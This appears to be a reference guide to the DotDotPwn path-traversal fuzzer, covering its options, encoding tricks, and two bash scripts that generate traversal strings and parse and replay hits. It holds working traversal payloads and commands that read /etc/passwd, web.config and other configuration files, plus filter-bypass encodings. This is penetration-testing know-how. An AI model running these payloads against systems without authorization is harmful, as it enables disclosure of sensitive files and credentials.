
DotDotPwn

Overview

DotDotPwn is a directory traversal fuzzer written in Perl (by chr1x and nitr0us; current release 3.0.2) for testing network services and web applications for path traversal. Its traversal engine combines many representations of ".." with many representations of the path separator (plain, URL-encoded, double URL-encoded, overlong UTF-8 and 16-bit Unicode forms), multiplies them out to every depth up to the one requested, and appends the file to look for. Modules speak HTTP, FTP and TFTP, fuzz a single parameter of a URL, send an arbitrary payload to any other text-based service, or simply print the generated strings for use with other tools.

A hit is decided by content rather than status code: a candidate is reported as vulnerable only when the response contains the text pattern expected for the requested file (for example "root:" for /etc/passwd), which keeps the results usable against servers that answer 200 to everything.

Installation

Install via apt (Kali Linux/Debian)

sudo apt-get update
sudo apt-get install dotdotpwn

From source

git clone https://github.com/wireghoul/dotdotpwn.git
cd dotdotpwn
perl dotdotpwn.pl    # no arguments prints the banner and the usage text

Perl dependencies

DotDotPwn needs the Switch, HTTP::Lite, Net::FTP, TFTP and Time::HiRes modules, plus IO::Socket::SSL when -S (SSL) is used. Net::FTP and Time::HiRes ship with Perl itself.

# Debian/Kali packages
sudo apt-get install libswitch-perl libhttp-lite-perl libio-socket-ssl-perl

# Or via cpan (TFTP is only needed for the tftp module)
cpan Switch HTTP::Lite TFTP IO::Socket::SSL

Verify installation

perl dotdotpwn.pl                                    # usage text listing the modules and options
perl -MSwitch -MHTTP::Lite -e 'print "modules OK\n"'  # dies with a clear message if a module is missing
which dotdotpwn                                      # Kali installs a wrapper script under this name

Basic Usage

The module is selected with -m and the host with -h; everything else has a default (the protocol's standard port, depth 6, 300 ms between requests, OS type "generic"). Note that -t is the delay between requests and -x is the port; neither is a protocol selector.

Command                                                                                      Description
perl dotdotpwn.pl -m http -h target.com                                                      Fuzz the web server's document root on port 80
perl dotdotpwn.pl -m ftp -h target.com                                                       Fuzz the FTP server (anonymous login by default)
perl dotdotpwn.pl -m http -h target.com -x 8080                                              HTTP on a custom port
perl dotdotpwn.pl -m http-url -u 'http://target.com/file.php?name=TRAVERSAL' -k 'root:'     Fuzz one parameter of a specific URL; TRAVERSAL marks the injection point

Common Traversal Patterns

HTTP traversal tests

# Basic HTTP test: GET /<traversal><file> against the document root
perl dotdotpwn.pl -m http -h example.com

# Quiet mode prints only the hits and the summary (every attempt is printed by default)
perl dotdotpwn.pl -m http -h example.com -q

# Non-standard port
perl dotdotpwn.pl -m http -h example.com -x 8080

# Fuzz a parameter of a specific URL; -k is the text that proves the file was read
perl dotdotpwn.pl -m http-url -u 'http://example.com/download.php?file=TRAVERSAL' -k 'root:'

FTP traversal tests

# Anonymous FTP (default credentials anonymous / dot@dot.pwn)
perl dotdotpwn.pl -m ftp -h ftp.example.com

# FTP on a non-standard port
perl dotdotpwn.pl -m ftp -h ftp.example.com -x 2121

# Authenticated FTP
perl dotdotpwn.pl -m ftp -h ftp.example.com -U user -P password

TFTP and other protocols

# TFTP (UDP/69); -C keeps going when the server sends nothing back
perl dotdotpwn.pl -m tftp -h example.com -C

# HTTPS: the same http module with -S; -x sets the port
perl dotdotpwn.pl -m http -h example.com -x 443 -S

# Any other text-based protocol: send a request read from a file whose injection
# point is the word TRAVERSAL, and match the reply against -k
perl dotdotpwn.pl -m payload -h example.com -x 8000 -p request.txt -k 'root:'

# Only print the generated traversal strings, for use with other tools
perl dotdotpwn.pl -m stdout -d 4

Encoding Methods

There is no encoding selector: every run exercises every encoding the engine knows. TraversalEngine.pm carries one list of representations of ".." and one list of representations of the separator; each fuzz string is one dot form joined to one separator form, repeated once per depth level, with the target file (and any special suffix, such as a trailing %00) appended. Representative forms from those lists (the real lists are longer):

Dot-dot forms        ..   %2e%2e   %252e%252e   %c0%ae%c0%ae   %uff0e%uff0e   ..%00   ..%01
Separator forms      /   \   %2f   %5c   %252f   %255c   %c0%af   %c1%9c   %u2215   %u2216

Plain and URL-encoded forms catch servers that do no filtering at all. Double-encoded forms (%252e, %252f) catch a filter that decodes once, sees nothing wrong, and hands the string to a component that decodes again. Overlong UTF-8 (%c0%ae, %c0%af) and %uXXXX forms target the decoder bugs behind the IIS Unicode and double-decode traversals. Backslash forms matter on Windows and in applications that canonicalize only forward slashes. The NUL and control-byte variants (..%00, ..%01) probe filters that mishandle those bytes while the filesystem layer ignores or truncates at them.

What you can influence is the shape around the encodings:

# Append the extension the application adds itself, so each request still ends in .php
perl dotdotpwn.pl -m http -h example.com -e .php

# Tell the engine which OS it is dealing with so it picks the right default file and
# pattern (/etc/passwd with "root:" on unix, boot.ini on windows); "generic" tries both
perl dotdotpwn.pl -m http -h example.com -o windows

# Let nmap detect the OS first (needs root)
sudo perl dotdotpwn.pl -m http -h example.com -O

# Stop at the first hit
perl dotdotpwn.pl -m http -h example.com -b

# After a hit, bisect to find the exact depth that is needed
perl dotdotpwn.pl -m http -h example.com -X
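To make the cross-product concrete, here is an added bash example (not DotDotPwn's own code) that rebuilds a slice of what the engine emits and shows why the double-encoded forms belong in the list: a filter that percent-decodes once and looks for "../" lets %252e%252e%252f through, and a back end that decodes the result a second time opens ../. The token lists are a hand-picked subset of the engine's, and the filter is a model written for this example, not any particular product.

```bash
#!/usr/bin/env bash
# Added example, not part of DotDotPwn: rebuilds the engine's approach of
# combining every ".." form with every separator form at each depth, and
# models a decode-once filter to show why double encoding is in the list.

# Hand-picked subset of the engine's ".." representations:
# plain, URL-encoded, double URL-encoded, overlong UTF-8.
DOT_TOKENS='.. %2e%2e %252e%252e %c0%ae%c0%ae'
# Hand-picked subset of separator representations:
# slash, backslash, URL-encoded, double URL-encoded, overlong UTF-8.
SLASH_TOKENS='/ \ %2f %5c %252f %c0%af'

# gen_traversals FILE DEPTH [EXT]
# One line per (dot form, separator form) pair, repeated DEPTH times, then the
# target file and the optional extension (what DotDotPwn's -e appends).
gen_traversals() {
  local file="$1" depth="$2" ext="${3-}" dot slash seg chain i
  for dot in $DOT_TOKENS; do
    for slash in $SLASH_TOKENS; do
      seg="$dot$slash"
      chain=""
      i=0
      while [ "$i" -lt "$depth" ]; do
        chain="$chain$seg"
        i=$((i + 1))
      done
      printf '%s%s%s\n' "$chain" "$file" "$ext"
    done
  done
}

# decode_once STRING
# Minimal single-pass percent decoder covering only the bytes that matter for
# traversal: %2e -> ".", %2f -> "/", %5c -> "\", %25 -> "%". Each rule runs once,
# left to right, so %252e becomes %2e (not "."), exactly as one real pass would.
decode_once() {
  printf '%s' "$1" | sed -e 's/%2[eE]/./g' -e 's/%2[fF]/\//g' -e 's/%5[cC]/\\/g' -e 's/%25/%/g'
}

# filter_once STRING
# Model of a naive filter: decode once, reject anything containing a dot-dot
# followed by either separator. Prints "blocked" or "passed".
filter_once() {
  case "$(decode_once "$1")" in
    *../* | *..\\*) echo blocked ;;
    *)              echo passed ;;
  esac
}

# backend_sees STRING
# What a component that percent-decodes the already-decoded value a second
# time ends up opening (the IIS-style double-decode situation).
backend_sees() {
  decode_once "$(decode_once "$1")"
}

# Stand-alone demonstration
echo "== candidates at depth 2 for etc/passwd with .php appended"
gen_traversals etc/passwd 2 .php
echo "== decode-once filter versus a back end that decodes again"
for p in '../../etc/passwd' '%2e%2e%2f%2e%2e%2fetc/passwd' '%252e%252e%252f%252e%252e%252fetc/passwd'; do
  printf '%-45s filter: %-7s back end opens: %s\n' "$p" "$(filter_once "$p")" "$(backend_sees "$p")"
done
```

With four dot forms and six separator forms the generator emits 24 candidates per depth level, so a run to depth 6 is 144 requests for this subset alone; the real engine's lists are several times longer, which is where the "Total traversal tests created" figure DotDotPwn prints at start-up comes from, and why -t (delay) and -q matter on a slow or monitored target.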

Advanced Options

Option    Usage                              Description
-m        -m http                            Module: http, http-url, ftp, tftp, payload or stdout
-h        -h target.com                      Hostname or IP address
-x        -x 8080                            Port (defaults: http 80, ftp 21, tftp 69)
-o        -o windows                         OS type if known: windows, unix or generic (default)
-O                                           Detect the OS with nmap before fuzzing (needs root)
-s                                           Grab the service banner first
-d        -d 8                               Maximum depth; every depth from 1 up to it is tried (default 6)
-f        -f /etc/motd                       File to request instead of the OS default
-E                                           Also request the @Extra_files list from TraversalEngine.pm (web.config, httpd.conf, ...)
-e        -e .php                            Extension appended to every fuzz string
-k        -k 'root:'                         Text the response must contain to count as a hit (required with http-url and payload)
-u        -u 'http://h/x.php?f=TRAVERSAL'    URL for the http-url module, with TRAVERSAL marking the injection point
-p        -p request.txt                     Payload file for the payload module, again with a TRAVERSAL marker
-S                                           Use SSL with the http and payload modules (http-url takes an https:// URL instead)
-M        -M POST                            HTTP method for the http module: GET, POST, HEAD, COPY or MOVE (default GET)
-U / -P   -U user -P pass                    FTP credentials (default anonymous / dot@dot.pwn)
-t        -t 1000                            Delay between requests in milliseconds (default 300)
-X                                           After a hit, bisect to find the exact depth needed
-b                                           Stop after the first hit
-q                                           Quiet: print hits and summary only
-C                                           Keep going when the host returns no data
-r        -r results.txt                     Report filename (default Reports/HOST_MM-DD-YYYY_HOUR-MIN.txt)

Custom file targets

Pair -f with -k: the file decides what is requested, the pattern decides what counts as a hit. Without -k the tool keeps the default pattern for the OS, which is unlikely to appear in an arbitrary file.

# Look for /etc/passwd
perl dotdotpwn.pl -m http -h example.com -f /etc/passwd -k 'root:'

# Look for a Windows system file
perl dotdotpwn.pl -m http -h example.com -o windows -f windows/win.ini -k 'for 16-bit app support'

# Look for the web server config
perl dotdotpwn.pl -m http -h example.com -f etc/apache2/apache2.conf -k 'ServerRoot'

# Look for application files
perl dotdotpwn.pl -m http -h example.com -f app/config/database.yml -k 'adapter:'

# Add the engine's built-in list of extra files (web.config, httpd.conf, ...)
perl dotdotpwn.pl -m http -h example.com -E

Custom depths and extensions

-d is a maximum: depth 10 sends every traversal at depths 1 through 10, so one run replaces a loop over depths. Three levels is rarely enough against a document root such as /var/www/html.

# Shallow (up to ../../../)
perl dotdotpwn.pl -m http -h example.com -d 3

# Deep, and bisect to report the exact depth once something hits
perl dotdotpwn.pl -m http -h example.com -d 10 -X

# Extension the application appends itself (e.g. include($page . ".asp"))
perl dotdotpwn.pl -m http -h example.com -e .asp

# -e takes a single extension; loop for several
for ext in .php .jsp .asp; do
  perl dotdotpwn.pl -m http -h example.com -e "$ext" -q -r "results_${ext#.}.txt"
done

Output and Results

Save results to file

Every run writes a report; -r only names it (the default is Reports/HOST_MM-DD-YYYY_HOUR-MIN.txt under the working directory).

# Name the report explicitly; -q keeps the terminal to hits and the summary
perl dotdotpwn.pl -m http -h example.com -q -r results.txt

# Review findings
cat results.txt

# Extract the hits: the tool marks them with "<- VULNERABLE!"
grep 'VULNERABLE' results.txt

Parsing results

# Only the vulnerable lines, live
perl dotdotpwn.pl -m http -h example.com | grep 'VULNERABLE'

# Count them (the run's own summary line is "[+] Total Traversals found: N")
grep -c 'VULNERABLE' results.txt

# Pull out just the URLs that worked, deduplicated
sed -n 's/^\[\*\] Testing Path: \(.*\) <- VULNERABLE!$/\1/p' results.txt | sort -u
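Once reports accumulate, the useful questions are which URLs actually worked and how shallow the traversal can be. Below is an added bash example (not part of DotDotPwn) that parses report text in the "[*] Testing Path: URL <- VULNERABLE!" line format the http module prints, deduplicates the hits and works out how many traversal segments each one used. The sample report is constructed for the example (check your own report if the regex matches nothing), and the depth counter recognizes only the separator encodings listed in its comment.

```bash
#!/usr/bin/env bash
# Added example, not part of DotDotPwn: parse a report, keep distinct hits,
# and measure how many traversal segments each hit needed.

# Constructed sample in the format of DotDotPwn's report lines (not a real scan).
SAMPLE_REPORT='[+] Report name: Reports/10.0.0.5_01-02-2024_10-15.txt
[*] Testing Path: http://10.0.0.5:80/../etc/passwd
[*] Testing Path: http://10.0.0.5:80/../../etc/passwd
[*] Testing Path: http://10.0.0.5:80/../../../etc/passwd <- VULNERABLE!
[*] Testing Path: http://10.0.0.5:80/../../../../etc/passwd <- VULNERABLE!
[*] Testing Path: http://10.0.0.5:80/..%2f..%2f..%2f..%2fetc/passwd <- VULNERABLE!
[*] Testing Path: http://10.0.0.5:80/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[*] Testing Path: http://10.0.0.5:80/../../../../etc/passwd <- VULNERABLE!
[+] Total Traversals found: 4'

# vulnerable_urls < report
# Distinct URLs the tool flagged, one per line, sorted.
vulnerable_urls() {
  sed -n 's/^\[\*\] Testing Path: \(.*\) <- VULNERABLE!$/\1/p' | sort -u
}

# traversal_depth URL FILE
# Strips scheme://host[:port]/ and the requested FILE, then counts separators
# in what remains. Recognized separator encodings: / \ %2f %5c %252f %255c
# (hex case-insensitive); other forms such as %c0%af are not counted.
traversal_depth() {
  local url="$1" file="$2" path trav
  path="${url#*://*/}"
  trav="${path%"$file"}"
  printf '%s' "$trav" | grep -oE '%252[fF]|%255[cC]|%2[fF]|%5[cC]|/|\\' | wc -l | tr -d ' '
}

# min_vulnerable_depth FILE < report
# Smallest depth among the hits: the value -X bisects towards, and the
# shortest payload to use when reproducing by hand.
min_vulnerable_depth() {
  local file="$1" url
  vulnerable_urls | while IFS= read -r url; do
    traversal_depth "$url" "$file"
  done | sort -n | head -n 1
}

# Stand-alone demonstration on the constructed sample
printf '%s\n' "$SAMPLE_REPORT" | vulnerable_urls | while IFS= read -r url; do
  printf 'depth %s  %s\n' "$(traversal_depth "$url" etc/passwd)" "$url"
done
printf 'minimum working depth: %s\n' "$(printf '%s\n' "$SAMPLE_REPORT" | min_vulnerable_depth etc/passwd)"
```

Feed a real report in with `vulnerable_urls < results.txt`; the URL list can then go straight to `xargs -n1 curl -s --path-as-is -o /dev/null -w '%{http_code} %{url_effective}\n'` to confirm each hit, with --path-as-is preventing curl from normalizing the ../ segments away before sending.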

Real-World Scenarios

Web application assessment

# Fuzz the parameter that takes a filename; -k decides what a hit looks like
perl dotdotpwn.pl -m http-url -u 'http://target.com/download.php?file=TRAVERSAL' -k 'root:' -d 8

# Several candidate parameters, one report each
i=0
for url in 'http://target.com/download?file=TRAVERSAL' \
           'http://target.com/get?name=TRAVERSAL' \
           'http://target.com/download.php?f=TRAVERSAL'; do
  i=$((i + 1))
  echo "[*] Testing URL: $url"
  perl dotdotpwn.pl -m http-url -u "$url" -k 'root:' -q -r "report_$i.txt"
done

# Whole document root, slowed to one request per second, report named for the engagement
perl dotdotpwn.pl -m http -h target.com -t 1000 -r assessment_target.txt

FTP server assessment

# Anonymous first
perl dotdotpwn.pl -m ftp -h ftp.target.com -q

# Then with the credentials you hold; -b stops at the first hit
perl dotdotpwn.pl -m ftp -h ftp.target.com -U admin -P password -b

Specific file targeting

# Each file with the text that proves it was read
while IFS='|' read -r file pattern; do
  echo "[*] Looking for: $file"
  perl dotdotpwn.pl -m http -h example.com -f "$file" -k "$pattern" -q
done <<'EOF'
/etc/passwd|root:
web.config|<configuration
config.php|<?php
settings.xml|<?xml
EOF

Multiple depth testing

A loop over depths repeats work: -d N already sends depths 1 through N. Run once with a generous maximum and let -X bisect to the smallest depth that works.

perl dotdotpwn.pl -m http -h example.com -d 15 -X

Server-Specific Testing

There is no per-server switch. The OS type (-o, or -O for nmap detection) selects the default files and match patterns, and -f/-k pick anything else; every encoding, including the Windows backslash forms, is sent regardless.

Apache testing

# Unix defaults: /etc/passwd matched on "root:"
perl dotdotpwn.pl -m http -h apache.target.com -o unix

# Apache config (Debian layout)
perl dotdotpwn.pl -m http -h apache.target.com -f etc/apache2/apache2.conf -k 'ServerRoot'

# Apache config (RHEL layout)
perl dotdotpwn.pl -m http -h apache.target.com -f etc/httpd/conf/httpd.conf -k 'ServerRoot'

IIS testing

# Windows defaults (boot.ini); boot.ini no longer exists on Vista and later
perl dotdotpwn.pl -m http -h iis.target.com -o windows

# web.config of the default site
perl dotdotpwn.pl -m http -h iis.target.com -o windows -f inetpub/wwwroot/web.config -k '<configuration'

# hosts file, present on every Windows version
perl dotdotpwn.pl -m http -h iis.target.com -o windows -f windows/system32/drivers/etc/hosts -k 'localhost'

Tomcat testing

# Tomcat runs on unix or windows; set the OS type and the connector port
perl dotdotpwn.pl -m http -h tomcat.target.com -x 8080 -o unix

# server.xml lives in conf/ beside webapps/, i.e. a couple of levels above the web root
perl dotdotpwn.pl -m http -h tomcat.target.com -x 8080 -f conf/server.xml -k '<Server' -d 4

Troubleshooting

Connection issues

# Test connectivity first
ping -c 3 target.com
nc -zv target.com 80

# Slow down (-t is the delay between requests in milliseconds, not a timeout)
# and keep going when the server answers with nothing
perl dotdotpwn.pl -m http -h target.com -t 1000 -C

# Check whether TLS is needed: -S for SSL, -x for the port
perl dotdotpwn.pl -m http -h target.com -x 443 -S

No results found

# Every attempt is printed by default; a short run shows whether the requests look right
perl dotdotpwn.pl -m http -h target.com -d 3

# The http module only fuzzes the document root; fuzz the actual parameter instead
perl dotdotpwn.pl -m http-url -u 'http://target.com/download.php?file=TRAVERSAL' -k 'root:'

# A wrong OS guess means the wrong default file and pattern; set the OS, or name a
# file and the text you expect in it
perl dotdotpwn.pl -m http -h target.com -o windows
perl dotdotpwn.pl -m http -h target.com -f etc/hostname -k 'target'

Missing Perl modules

# Check each module DotDotPwn needs
for m in Switch HTTP::Lite Net::FTP Time::HiRes IO::Socket::SSL TFTP; do
  perl -M"$m" -e 1 2>/dev/null && echo "OK      $m" || echo "MISSING $m"
done

# Install whatever is missing
cpan -i Switch HTTP::Lite TFTP IO::Socket::SSL

Integration with Other Tools

Chain with curl and other tools

Reproducing a hit by hand needs curl --path-as-is: without it curl squashes the ../ segments out of the URL before sending the request, so you test a different path than the fuzzer did.

# Keep only the URLs that worked
sed -n 's/^\[\*\] Testing Path: \(.*\) <- VULNERABLE!$/\1/p' results.txt | sort -u > vulnerable_urls.txt

# Re-request each one verbatim and show the first lines of the file
while IFS= read -r url; do
  echo "== $url"
  curl -s --path-as-is "$url" | head -n 5
done < vulnerable_urls.txt

# Generate the payloads only and hand them to another tool (e.g. as an intruder wordlist)
perl dotdotpwn.pl -m stdout -d 6 -f /etc/passwd > traversal_wordlist.txt

Automated assessment

#!/bin/bash
# One report per host:port, read from a scope file with lines like "host port"
while read -r host port; do
  [ -n "$host" ] || continue
  echo "[*] Fuzzing $host:$port"
  perl dotdotpwn.pl -m http -h "$host" -x "$port" -q -t 500 \
    -r "results_${host}_${port}.txt"
done < scope.txt

# Combine the hits
grep -h 'VULNERABLE' results_*.txt | sort -u > final_results.txt

Best Practices

  • Let the engine do the encoding work; spend your effort on the right module (http-url for a parameter, http for the document root) and on -f/-k for files worth reading
  • Set -d generously and use -X to learn the exact depth; one run covers every shallower depth
  • Test every exposed protocol (HTTP, HTTPS with -S, FTP, TFTP, custom payloads) on every port it lives on
  • Match -e to the extension the application appends
  • Keep the report (-r) and the exact command line, and re-verify hits with curl --path-as-is
  • Slow the run with -t and use -C against flaky servers; a default run is well over a thousand requests, which WAFs and rate limiters notice
  • Supply the OS with -o when you know it; -O needs root for nmap
  • Stay inside the authorized scope and target list
  • Combine with other vulnerability assessment tools

Resources